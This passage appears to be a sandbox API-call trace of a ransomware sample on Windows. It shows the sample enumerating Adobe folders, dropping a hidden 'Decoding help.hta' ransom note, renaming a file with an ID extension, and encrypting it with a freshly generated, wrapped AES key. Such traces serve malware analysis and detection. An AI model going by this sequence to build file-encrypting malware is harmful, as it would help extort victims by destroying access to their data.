lpParameter=0x24f7f220, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x46c [0050.097] CloseHandle (hObject=0x46c) returned 1 [0050.097] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru_RU", cAlternateFileName="")) returned 1 [0050.097] lstrcmpW (lpString1=".", lpString2="ru_RU") returned -1 [0050.097] lstrcmpW (lpString1="..", lpString2="ru_RU") returned -1 [0050.097] lstrcmpiW (lpString1="windows", lpString2="ru_RU") returned 1 [0050.100] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0050.100] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0050.100] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="ru_RU" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU" [0050.100] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\*.*" [0050.100] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0050.100] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24f97288, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x46c [0050.107] CloseHandle (hObject=0x46c) returned 1 [0050.107] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk_SK", cAlternateFileName="")) returned 1 [0050.107] lstrcmpW (lpString1=".", lpString2="sk_SK") returned -1 [0050.107] lstrcmpW (lpString1="..", lpString2="sk_SK") returned -1 [0050.107] lstrcmpiW (lpString1="windows", lpString2="sk_SK") returned 1 [0050.109] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0050.109] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0050.109] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="sk_SK" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK" [0050.109] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\*.*" [0050.109] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0050.109] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24fcf360, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x46c [0050.114] CloseHandle (hObject=0x46c) returned 1 [0050.114] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl_SI", cAlternateFileName="")) returned 1 [0050.114] lstrcmpW (lpString1=".", lpString2="sl_SI") returned -1 [0050.114] lstrcmpW (lpString1="..", lpString2="sl_SI") returned -1 [0050.114] lstrcmpiW (lpString1="windows", lpString2="sl_SI") returned 1 [0050.117] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0050.117] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0050.117] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="sl_SI" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI" [0050.117] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\*.*" [0050.117] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0050.117] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x25007438, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x46c [0050.123] CloseHandle (hObject=0x46c) returned 1 [0050.123] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv_SE", cAlternateFileName="")) returned 1 [0050.123] lstrcmpW (lpString1=".", lpString2="sv_SE") returned -1 [0050.123] lstrcmpW (lpString1="..", lpString2="sv_SE") returned -1 [0050.123] lstrcmpiW (lpString1="windows", lpString2="sv_SE") returned 1 [0050.126] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0050.126] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0050.126] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="sv_SE" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE" [0050.126] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\*.*" [0050.126] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0050.126] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2501f4a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x46c [0050.136] CloseHandle (hObject=0x46c) returned 1 [0050.136] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr_TR", cAlternateFileName="")) returned 1 [0050.136] lstrcmpW (lpString1=".", lpString2="tr_TR") returned -1 [0050.136] lstrcmpW (lpString1="..", lpString2="tr_TR") returned -1 [0050.136] lstrcmpiW (lpString1="windows", lpString2="tr_TR") returned 1 [0050.138] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0050.138] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0050.138] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="tr_TR" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR" [0050.138] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\*.*" [0050.139] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0050.139] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x250675d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x46c [0050.163] CloseHandle (hObject=0x46c) returned 1 [0050.163] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk_UA", cAlternateFileName="")) returned 1 [0050.163] lstrcmpW (lpString1=".", lpString2="uk_UA") returned -1 [0050.163] lstrcmpW (lpString1="..", lpString2="uk_UA") returned -1 [0050.163] lstrcmpiW (lpString1="windows", lpString2="uk_UA") returned 1 [0050.217] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0050.217] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0050.217] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="uk_UA" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA" [0050.217] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\*.*" [0050.217] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0050.217] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x250c7778, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0050.219] CloseHandle (hObject=0x384) returned 1 [0050.219] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d580500, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d580500, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh_CN", cAlternateFileName="")) returned 1 [0050.219] lstrcmpW (lpString1=".", lpString2="zh_CN") returned -1 [0050.219] lstrcmpW (lpString1="..", lpString2="zh_CN") returned -1 [0050.219] lstrcmpiW (lpString1="windows", lpString2="zh_CN") returned -1 [0050.222] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0050.222] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0050.222] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="zh_CN" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN" [0050.222] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\*.*" [0050.222] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0050.222] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x250df7e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0050.228] CloseHandle (hObject=0x384) returned 1 [0050.228] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d580500, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d580500, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh_TW", cAlternateFileName="")) returned 1 [0050.229] lstrcmpW (lpString1=".", lpString2="zh_TW") returned -1 [0050.229] lstrcmpW (lpString1="..", lpString2="zh_TW") returned -1 [0050.229] lstrcmpiW (lpString1="windows", lpString2="zh_TW") returned -1 [0050.229] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0050.229] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0050.229] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="zh_TW" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW" [0050.229] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\*.*" [0050.229] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0050.229] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1131c2a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0050.233] CloseHandle (hObject=0x384) returned 1 [0050.233] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d580500, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d580500, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh_TW", cAlternateFileName="")) returned 0 [0050.233] FindClose (in: hFindFile=0x671070 | out: hFindFile=0x671070) returned 1 Thread: id = 297 os_tid = 0x410 [0042.395] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*", lpFindFileData=0xb40fd30 | out: lpFindFileData=0xb40fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671030 [0042.421] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.421] FindNextFileW (in: hFindFile=0x671030, lpFindFileData=0xb40fd30 | out: lpFindFileData=0xb40fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.421] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.421] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.421] FindNextFileW (in: hFindFile=0x671030, lpFindFileData=0xb40fd30 | out: lpFindFileData=0xb40fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e186d00, ftCreationTime.dwHighDateTime=0x1cfb543, ftLastAccessTime.dwLowDateTime=0x7e186d00, ftLastAccessTime.dwHighDateTime=0x1cfb543, ftLastWriteTime.dwLowDateTime=0x7e186d00, ftLastWriteTime.dwHighDateTime=0x1cfb543, nFileSizeHigh=0x0, nFileSizeLow=0x3d800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdbeRdrSecUpd10111.msp", cAlternateFileName="ADBERD~2.MSP")) returned 1 [0042.421] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*") returned="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*" [0042.421] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*") returned 46 [0042.421] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\Decoding help.hta" [0042.421] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\Decoding help.hta" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\decoding help.hta")) returned 0xffffffff [0042.421] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\Decoding help.hta" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x63c [0042.440] WriteFile (in: hFile=0x63c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xb40fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xb40fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.441] CloseHandle (hObject=0x63c) returned 1 [0042.441] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.441] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AdbeRdrSecUpd10111.msp") returned 1 [0042.441] lstrlenW (lpString="AdbeRdrSecUpd10111.msp") returned 22 [0042.441] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*") returned="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*" [0042.441] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*") returned 46 [0042.441] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\", lpString2="AdbeRdrSecUpd10111.msp" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp") returned="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" [0042.441] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp") returned="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" [0042.441] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.[ID]g9uZrLhJaygpwRm1[ID]" [0042.441] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.449] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x640 [0042.450] CreateFileMappingA (hFile=0x640, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x644 [0042.450] CryptAcquireContextA (in: phProv=0xb40fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xb40fcec*=0x3448698) returned 1 [0042.450] CryptGenKey (in: hProv=0x3448698, Algid=0x6610, dwFlags=0x1, phKey=0xb40fce8 | out: phKey=0xb40fce8*=0x671270) returned 1 [0042.450] CryptExportKey (in: hKey=0x671270, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xb40fbe4, pdwDataLen=0xb40fce4 | out: pbData=0xb40fbe4*, pdwDataLen=0xb40fce4*=0x2c) returned 1 [0042.450] MapViewOfFile (hFileMappingObject=0x644, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3d800) returned 0x21810000 [0042.455] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xb40fbe4*, pdwDataLen=0xb40fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xb40fbe4*, pdwDataLen=0xb40fcf8*=0x100) returned 1 [0042.455] CryptEncrypt (in: hKey=0x671270, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x21810000, pdwDataLen=0xb40fce4*=0x3d800, dwBufLen=0x3d800 | out: pbData=0x21810000*, pdwDataLen=0xb40fce4*=0x3d800) returned 1 [0042.472] UnmapViewOfFile (lpBaseAddress=0x21810000) returned 1 [0042.476] CloseHandle (hObject=0x644) returned 1 [0042.476] CryptDestroyKey (hKey=0x671270) returned 1 [0042.476] CryptReleaseContext (hProv=0x3448698, dwFlags=0x0) returned 